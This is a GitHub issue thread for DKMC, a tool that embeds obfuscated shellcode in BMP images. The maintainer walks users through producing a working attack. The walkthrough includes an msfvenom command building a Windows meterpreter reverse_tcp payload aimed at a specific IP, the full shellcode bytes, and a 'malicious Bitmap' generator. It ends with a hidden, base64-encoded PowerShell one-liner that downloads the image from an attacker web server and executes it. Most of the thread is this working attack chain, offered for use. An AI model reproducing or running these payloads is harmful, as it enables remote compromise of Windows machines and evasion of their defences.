Comments (23)
Mr-Un1k0d3r
commented on August 23, 2024
1
Glad you figured out.
from dkmc.
Mr-Un1k0d3r
commented on August 23, 2024
shellcode format should be \x00\x00\x00 you are probably not using the right format.
from dkmc.
amainyebriggs
commented on August 23, 2024
How do I do thata
from dkmc.
amainyebriggs
commented on August 23, 2024
I used the SC it's still the same error
from dkmc.
leosilberg
commented on August 23, 2024
Hey man. Great work with this tool. However, I'm also getting the error message after using sc command.
from dkmc.
Mr-Un1k0d3r
commented on August 23, 2024
Before launching the tool make sure to create the output folder
$ git clone https://github.com/Mr-Un1k0d3r/DKMC
$ cd DKMC
$ mkdir output
msfvenom -a x86 -p windows/meterpreter/reverse_tcp -e generic/none -f raw LPORT=8080 LHOST=24.37.41.158 > payload
(shellcode)>>> set source /root/payload
[+] source value is set.
(shellcode)>>> run
[+] Shellcode:
\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x18\x25\x29\x9e\x68\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xc3\x01\xc3\x29\xc6\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5
(shellcode)>>> exit
(generate)>>> set shellcode \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x18\x25\x29\x9e\x68\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xc3\x01\xc3\x29\xc6\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5
[+] shellcode value is set.
(generate)>>> run
[+] Image size is 300 x 275
[+] Generating obfuscation key 0x35af22c7
[+] Shellcode size 0x12b (299) bytes
[+] Adding 1 bytes of padding
[+] Generating magic bytes 0xa1957f94
[+] Final shellcode length is 0x17b (379) bytes
[+] New BMP header set to 0x424de980c50300
[+] New height is 0x0e010000 (270)
[+] Successfully save the image. (/root/DKMC/output/output-1505309035.bmp)
If you are following this path it should work as expected.
from dkmc.
amainyebriggs
commented on August 23, 2024
i have followed the steps still outputs the same error am using kali linux i386
from dkmc.
leosilberg
commented on August 23, 2024
Yeah still having issues. Testing on Windows 10 Python 2.7
(generate)>>> set shellcode \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x18\x25\x29\x9e\x68\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xc3\x01\xc3\x29\xc6\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5
�[32m[+] shellcode value is set.�[00m
(generate)>>> run
�[32m[+] Image size is 300 x 275�[00m
�[32m[+] Generating obfuscation key 0x11943dc6�[00m
�[32m[+] Shellcode size 0x12b (299) bytes�[00m
�[32m[+] Adding 1 bytes of padding�[00m
�[32m[+] Generating magic bytes 0x37621f45�[00m
�[91m[-] >>> Something when wrong during the obfuscation. Wrong shellcode format?�[00m
from dkmc.
Mr-Un1k0d3r
commented on August 23, 2024
can you try to update the gen.py with the one I attached and show me the error stack trace.
the gen.py is located in module/ folder
from dkmc.
leosilberg
commented on August 23, 2024
Possible missing import?
(generate)>>> run
�[32m[+] Image size is 300 x 275�[00m
�[32m[+] Generating obfuscation key 0x5242695b�[00m
�[32m[+] Shellcode size 0xc7 (199) bytes�[00m
�[32m[+] Adding 1 bytes of padding�[00m
�[32m[+] Generating magic bytes 0xf2e29eaaL�[00m
Traceback (most recent call last):
File "dkmc.py", line 39, in
mod.show_menu()
File "C:\DKMC-master\module\module.py", line 21, in show_menu
self.do_action()
File "C:\DKMC-master\module\module.py", line 42, in do_action
self.exec_action(data)
File "C:\DKMC-master\module\module.py", line 57, in exec_action
self.run_action()
File "C:\DKMC-master\module\gen.py", line 44, in run_action
shellcode = self.gen_shellcode(self.vars["shellcode"][0])
File "C:\DKMC-master\module\gen.py", line 76, in gen_shellcode
shellcode = hex(magic)[2:].decode("hex") + shellcode
File "C:\Python27\lib\encodings\hex_codec.py", line 42, in hex_decode
output = binascii.a2b_hex(input)
TypeError: Odd-length string
from dkmc.
Mr-Un1k0d3r
commented on August 23, 2024
Okay this is caused by your copy paste it probably add some \r\n at the end when you copy it. To avoid that I'll strip the input before processing.
from dkmc.
Mr-Un1k0d3r
commented on August 23, 2024
pushed the patch to remove \r & \n
git pull and you should be good
from dkmc.
leosilberg
commented on August 23, 2024
Still no luck with your code unfortunately.
I have been playing around with gen.py specifically the gen_shellcode function. It seems the shell code length gets messed when adding other bytes.
(generate)>>> run
�[32m[+] Image size is 300 x 275�[00m
�[32m[+] Generating obfuscation key 0x128b4be7�[00m
�[32m[+] Shellcode size 0x31c (796) bytes�[00m
�[32m[+] Generating magic bytes 0x4349e106�[00m
�[32m[+] Shellcode size 0x324 (804) bytes�[00m
�[32m[+] Shellcode size 0x324 (804) bytes�[00m
�[32m[+] Shellcode size 0x377 (887) bytes�[00m
�[32m[+] Shellcode size 0x377 (887) bytes�[00m
�[32m[+] Adding 1 bytes of padding�[00m
�[32m[+] Shellcode size 0x378 (888) bytes�[00m
�[32m[+] Final shellcode length is 0x370 (880) bytes�[00m
�[32m[+] New BMP header set to 0x424de98bc30300�[00m
�[32m[+] New height is 0x0e010000 (270)�[00m
�[32m[+] Successfully save the image. (C:\DKMC-master/output/output-1505416245.bmp)�[00m
This doesn't let me execute the shell code but it's progress
from dkmc.
Mr-Un1k0d3r
commented on August 23, 2024
This is the expected behavior. This module only generate the final payload. You can now use the image C:\DKMC-master/output/output-1505416245.bmp to deliver your payload
The ps and web module allow you to generate the powershell one liner pretty easily.
from dkmc.
leosilberg
commented on August 23, 2024
Powershell and web server work perfectly. But I'm still not getting code execution. I had to remove in the pad_shellcode shellcode.replace("\x","").decode. I doubt that the format is correct to execute. I've no idea what to do.
from dkmc.
Mr-Un1k0d3r
commented on August 23, 2024
Here is the complete WalkThrough of how to get a shell it work #1 on my side.
Tool output:
=====================================================================
| |
| Module to generate shellcode out of raw metasploit shellcode file |
| |
=====================================================================
Allowed options:
[*] (show) Show module variables
[*] (set) Set value (set key value)
[*] (run) Run the module
[*] (exit) Go back to the main menu
Module Variables description:
source Path to the raw shellcode file
Current variable value:
source =
(shellcode)>>> set source SHELLCODE
[+] source value is set.
(shellcode)>>> run
[+] Shellcode:
\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x18\x25\x29\x9e\x68\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xc3\x01\xc3\x29\xc6\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5
(shellcode)>>> exit
=================================================================================
| |
| Module to generate malicious Bitmap image with embedded obfuscation shellcode |
| |
=================================================================================
Allowed options:
[*] (show) Show module variables
[*] (set) Set value (set key value)
[*] (run) Run the module
[*] (exit) Go back to the main menu
Module Variables description:
debug Show debug output. More verbose
source Image source file path
shellcode Shellcode payload using \x41\x41 format
output Output file path
Current variable value:
debug = false
source = sample/default.bmp
shellcode =
output = output/output.bmp
(generate)>>> set shellcode \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x18\x25\x29\x9e\x68\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xc3\x01\xc3\x29\xc6\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5
[+] shellcode value is set.
(generate)>>> run
[+] Image size is 300 x 275
[+] Generating obfuscation key 0x3b1bf4e3
[+] Shellcode size 0x12b (299) bytes
[+] Adding 1 bytes of padding
[+] Generating magic bytes 0xdfe6936e
[+] Final shellcode length is 0x17b (379) bytes
[+] New BMP header set to 0x424de980c50300
[+] New height is 0x0e010000 (270)
[+] Successfully save the image. (/home/me/DKMC/output/output.bmp)
(generate)>>> exit
=========================================
| |
| Module to generate Powershell payload |
| |
=========================================
Allowed options:
[*] (show) Show module variables
[*] (set) Set value (set key value)
[*] (run) Run the module
[*] (exit) Go back to the main menu
Module Variables description:
url Url that point to the malicious image
rand Use random variables name
Current variable value:
url =
rand = true
(powershell)>>> set url http://10.0.0.153:8080/output.bmp
[+] url value is set.
(powershell)>>> run
[+] Powershell script:
powershell.exe -nop -w hidden -enc JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBDAEcAbgBwAHUAbABrAEMALwB6AEUAMQBNAEQAVQAwAE0AagBFADIATgB6AE0AdQBNAGoAWQAhAHYAVgBaAHQAVAA5AHMANgBGAFAANgBPAHgASAArAHcAcABrAHAASgBwAEQAUQBVADIASgBVAG0AcABFAGsAcgBiAFkARQBPAFcAbgBvAEoARgBMAHEAdQBtAHQAegBrAHAARABFADQAYwBiACEAZABvAEkAegA5ADkAMwB1AGMASgBxAE8AcwA1AFYANgBtAFMAVABmADkAVQBMACsAYwBZAHgAOAAvAHoAegBtAFAANwBZAE8AdQArADEAcQB5AFEAUABkAEUAQwBLAFEAKwBCAEsAbQBZAFMATQBuAE8ANQBzAGIAbQBSAHUAMwBvADYAUABNACEAKwB1ADMAVwA0AGUAMQBJAFAAKwA0AC8AMwBwAHkAcgBlAC8ASwBSAGYATABJADIATgA2AEkAOABEAGIAUQB4ADcASQA3AE8AcgB0AHYAZABiAFAAYgA1ADcASwB5AG4AagA1AE8ARABxADYAUABoAE0AZgBtACsAdQBVAEgASwBiADAAIQBsAFQAWQBoAGQAdQA2AFAAeQBXAHkATABDAG4ASQBOAEwAaQBrADQAbQBSAFEAQgBoAEwAcwBGADUATgBxADcAUgA3AFAAeAB4AEgAbwB0AHoAeABuACEAZgBlADkAegBNAHMAcgBaAEkASwBFAHMAbgBlADMAdQB0AFgARQBwAEkAOQBhAEwAdgBIAFkASgB1AEsAZwBYAEoAbABEAE4AUQB0AGsATwBlAHkARwBVAE0ARQB1AHEAbgAwADIAcwBJAE4AUABsAE8AYQB0ACsAOABRAHkANgBtAGwASgBkAG0AOAB4AFkATgBZAGoAeABnAE0AdwAzAE4AMwBJAGsASQBxAEkAbgBmADgAegBQAE8AdABHADEAOQAvAFcAbwA1ADQALwByADIAeABPAHYAYwA1AHAAUQByADIALwBMAG4AUwBrAFAAaQBoAFoAeABiAEQAdgBuAGgAbQAhADMAUAA1AHgAbgBZAFYAbwA4AEYAVQBpAGcAUgBhAGUAKwBTAHAAYgBzADcAMwBrAFcAcQBhACEAUgA5AFgATwAwAE8AZQBxAEIAagBFAFMAcgBMAE0AZQBoAFYAaAA1AEsAZwBjADUAawB1AG4AOAAwAHMAdABqAEMAMQBMAFcAdwBPAEUASQBsAG0ARwBFAHAAUQA2AE8AbAAxADAAegB0AHgAIQAzAFkAdAB6AFQAbAAzAHkAUwBkADcAWABFAFoAeQBsAHEAZQBhAEoAWQBEAHoARwBxAFQASQBmAEoAQgAzAEwAIQBEAGwASABkAEUAMAA1AEgAIQBHADAAYwBUAHUAdwAzADAARgB3AEYAdQBkADcARwBVAG4AdABCAHAAbwA2AGIAaABJADEANgB2AEIAOQBnAG8ATwBGAC8ANgBXAHMAeAByAHUARQB0AEUATwBmAGkAdABrAEkAegBRAC8ARABEAG8ALwBFADQAagBQAFIAZABTAE0AZwArAHYAcAA5AFEATgBsAFIANABPAEQANAA2AHQAcwBUAGYANAA4AEQAMQBUAGYAdQBKAGcAQgBQAEoAYwA5AEUASQBvAFYAYQAzADAAawBEAFoAZgAwAE0ARABhAHEAaABaAHgAagB0ADMAWQB1AGMAMwAhAG0AWgBHAHkANABHADAAOABtAHAARABiADEAYgAwACsASABEACsANQBiADEAOQB1AHUAbgBOAEYAMQBsAHAAegA2AC8AbQBVAHYAagB2ADQAZQBaAGYATABLADUAKwBGAEkAMABaAHQAawBpAGwAYgBqAG8AVwBEAGgANQBIAG4ATgBGAC8AegBYAFIAcQB4AHoARgBZACsATQAyAGUAdgA1ADMASQBhAEkAcABkAEMAZQBwAHoAUgBoAFEAWgBXAHkAOQBqAHAARwBJAGUASgBRAEkATwBkAFYAWgBuADAATQAyADcAYgBLAEMAUQBqAGIAdwBHAEYARwB0AFcASABIAEoAZQBOAFYAdAAwADcAQwA5AEUALwBmAC8AWgB6AHgARQBHAFEAegB3AEsAeABRAEcAQgBVAG0AagBQAE0AeQBtACEAWABoAHQAdABWAE4AZQA1ACEAZwBxAG8AdQArAGgAYwBSAEcAVwBDAGgAUQBXAFoAZgBGAE0AYQA5ADIATgAzADAAMABzAGwAcQBjAEsAdQBXAFMAUQBZADYAVgBHAHIAagBFAEIAOABvAGgAZABFAGsAegBWAGEAeQBjAGEAdQBaAGEARgBFADMAcgBPAGQAeABlAHoAagBVAEwAcQBOAEwAVgBjAGgATgBuAEIAZABCAHkANAA1AFoASQBsAFoAWgA1AGcASQB3AGoAQwBPAGQAKwBCAGcARwBqADMARwBEAGkAawBpAE0AVwB3AHYANwBjAFoANwBNAHEAIQBHAHMAdABJAGkAMwBLAE8AVQB0AG4AdQBOAEkAZABNAG8ASQBqAEIAZwBsAGYAbQB6AHkAUwBHAEcAdQBaAE0ANAA3AG4AZwArADQAbQBHAFkAYwBFAHIAUQByADEATwBPAEIAMABoAGwAcABSAFYAbABtAFIAZQBuAFEARwBvAGYAVgBxAHMARgBVAGgATABhAHIARwA0AEYATQBCAHMAeABRAHEAawB1ADUAegBvAFYAMAB5AFoARgBLAGoARwBoAG0AcwBYADgAbQA5AFAAdwB5AHUAawBxAFkAeQB4AHAAYQBFAGsAagBtADcASwB0AFAAeAAvAGwAeQBiAHcAcQBsAEYARwBnAFAAMgA3ADIALwBaADQATwBRAHcAUABvAHcAZgBmAFMAUABRAHEAKwBuAFoAQgA5AFIARgBtAEwAWgBRAGwAbABPAE4AdQBTAEgAdQBVAHkANQBvADIASwBhAGEAMgB1ADkAaQByAGIATwA5AHIAYQAzAHQAaABtAGQAKwAyADMALwB0ADcAbgAxAG8AZgBHAGgAcwBpAFYAeABuAHUAZgBhAG0AUwBmAGEAdQBLAEoAegBhAEwARgBQAHQAMwByAFcATQB1ADQAUABUAC8AdQBuAGgAaABhAG0AYwAvADkAQwB6AEgAcABVAHEAcABoAHgAcABRADQAbQBxAGMAdQBaACEAeQBJAE4AUwBaAFEAYQBDAEcAUQAvAGIAWABuAHQAZAAzAFkAQgBNAGcAYQBPAFcAbwA5AHAAWABvAEQAYwA1AEYANABHAFIAdwBuAFgANgBoAEsAcQA4ADAATQBvAEoANQB0AE0ARgBOAG4AZAAzADEAcgBZAGMAOAB0AFAAUQBlAGQAYgBLAGEAbQBoAHYANwB3AHMAZQB3AGgAVABTAHIAOQBoADYASgA1AEQATwBkAE8AdwAyAEgAbgBZAGIARABaAFMAMAB4AHMAUAA3AEIAawBMAHoAZABoAFIAYQBJAHAAdgBiAHEAKwB1ADYAUgBoADkALwBoAFgAZAB0ACEATAB3AEkAWQBFAEYASABlAHoAUwBNAGcAcwA2AGQAZgA4AGwAUAB0AEsARAAvAEwAeAB0AGwAUwBzAGIANABGAC8ANABtAEcAOAA5AGoALwB6AEwANwBKAG8AWQBhADcAZwBwAG0ASwB4AFkAdgBCADMANgBMAHIARAA4AEcANgBaAEkAeQBqAFoANAArAGEAaABpAEgAUgBUADIAKwBDAGEAcwB5AFMAWgBkAHUAOABaAGQAVQBZAC8ANQBGADUAVwBkAGUAVwBLAGUANQByAHYAZgB4AG0AdAAvAGMAcwBEADYAWgB4AE8AaABHAFoAIQBrAHAAeABSADcAeABlAFEAVwAzADUASQBPAHoAZgBIADgAcgBUAGEAVwB1AFgANABzAHAAdgBzAGsAeQBjADgAUABhAHQAYQBUAGYAagB0AGgARABKAHoAbABvAHQAVABzAFgAdwB5ADgAbgArAGYARwA5AG0AagA5AHcAaAAzAFEANwBWACsAUwAxAFcAZgBLAEQAMQBCAEgASwBwAHQAcgBkAHcAVQBlAGMAbgBPAFYARwA1ADgAagBhAEYAKwBvAFQAdQBVAGQAIQBpAGoAMgBmAHkAQgBrAEUAZwBDACsAegArAG0AYwB4AEwAUwBRAE4AOABNADUAYQBqAHEALwBZAGMAOAAwAHEAYQBQAHcAUAAzAGEAaQBJADkAUgB3AEwAIQAhACEAPQAiAC4AUgBlAHAAbABhAGMAZQAoACIAIQAiACwAIAAiAEEAIgApACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA==
(powershell)>>> exit
=================================
| |
| Module to launch a web server |
| |
=================================
Allowed options:
[*] (show) Show module variables
[*] (set) Set value (set key value)
[*] (run) Run the module
[*] (exit) Go back to the main menu
Module Variables description:
folder Base folder used to deliver files
certificate Certificate path
port Port used to bind the web server
https Use HTTPS
Current variable value:
folder = /home/charles.hamilton/DKMC/output/
certificate = core/util/cert/default.pem
port = 80
https = false
(web)>>> run
[+] Starting web server on port 80
[+] Stopping web server
(web)>>> set port 8080
[+] port value is set.
(web)>>> run
[+] Starting web server on port 8080
On the PowerShell console I ran the PowerShell one liner:
powershell.exe -nop -w hidden -enc JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBDAEcAbgBwAHUAbABrAEMALwB6AEUAMQBNAEQAVQAwAE0AagBFADIATgB6AE0AdQBNAGoAWQAhAHYAVgBaAHQAVAA5AHMANgBGAFAANgBPAHgASAArAHcAcABrAHAASgBwAEQAUQBVADIASgBVAG0AcABFAGsAcgBiAFkARQBPAFcAbgBvAEoARgBMAHEAdQBtAHQAegBrAHAARABFADQAYwBiACEAZABvAEkAegA5ADkAMwB1AGMASgBxAE8AcwA1AFYANgBtAFMAVABmADkAVQBMACsAYwBZAHgAOAAvAHoAegBtAFAANwBZAE8AdQArADEAcQB5AFEAUABkAEUAQwBLAFEAKwBCAEsAbQBZAFMATQBuAE8ANQBzAGIAbQBSAHUAMwBvADYAUABNACEAKwB1ADMAVwA0AGUAMQBJAFAAKwA0AC8AMwBwAHkAcgBlAC8ASwBSAGYATABJADIATgA2AEkAOABEAGIAUQB4ADcASQA3AE8AcgB0AHYAZABiAFAAYgA1ADcASwB5AG4AagA1AE8ARABxADYAUABoAE0AZgBtACsAdQBVAEgASwBiADAAIQBsAFQAWQBoAGQAdQA2AFAAeQBXAHkATABDAG4ASQBOAEwAaQBrADQAbQBSAFEAQgBoAEwAcwBGADUATgBxADcAUgA3AFAAeAB4AEgAbwB0AHoAeABuACEAZgBlADkAegBNAHMAcgBaAEkASwBFAHMAbgBlADMAdQB0AFgARQBwAEkAOQBhAEwAdgBIAFkASgB1AEsAZwBYAEoAbABEAE4AUQB0AGsATwBlAHkARwBVAE0ARQB1AHEAbgAwADIAcwBJAE4AUABsAE8AYQB0ACsAOABRAHkANgBtAGwASgBkAG0AOAB4AFkATgBZAGoAeABnAE0AdwAzAE4AMwBJAGsASQBxAEkAbgBmADgAegBQAE8AdABHADEAOQAvAFcAbwA1ADQALwByADIAeABPAHYAYwA1AHAAUQByADIALwBMAG4AUwBrAFAAaQBoAFoAeABiAEQAdgBuAGgAbQAhADMAUAA1AHgAbgBZAFYAbwA4AEYAVQBpAGcAUgBhAGUAKwBTAHAAYgBzADcAMwBrAFcAcQBhACEAUgA5AFgATwAwAE8AZQBxAEIAagBFAFMAcgBMAE0AZQBoAFYAaAA1AEsAZwBjADUAawB1AG4AOAAwAHMAdABqAEMAMQBMAFcAdwBPAEUASQBsAG0ARwBFAHAAUQA2AE8AbAAxADAAegB0AHgAIQAzAFkAdAB6AFQAbAAzAHkAUwBkADcAWABFAFoAeQBsAHEAZQBhAEoAWQBEAHoARwBxAFQASQBmAEoAQgAzAEwAIQBEAGwASABkAEUAMAA1AEgAIQBHADAAYwBUAHUAdwAzADAARgB3AEYAdQBkADcARwBVAG4AdABCAHAAbwA2AGIAaABJADEANgB2AEIAOQBnAG8ATwBGAC8ANgBXAHMAeAByAHUARQB0AEUATwBmAGkAdABrAEkAegBRAC8ARABEAG8ALwBFADQAagBQAFIAZABTAE0AZwArAHYAcAA5AFEATgBsAFIANABPAEQANAA2AHQAcwBUAGYANAA4AEQAMQBUAGYAdQBKAGcAQgBQAEoAYwA5AEUASQBvAFYAYQAzADAAawBEAFoAZgAwAE0ARABhAHEAaABaAHgAagB0ADMAWQB1AGMAMwAhAG0AWgBHAHkANABHADAAOABtAHAARABiADEAYgAwACsASA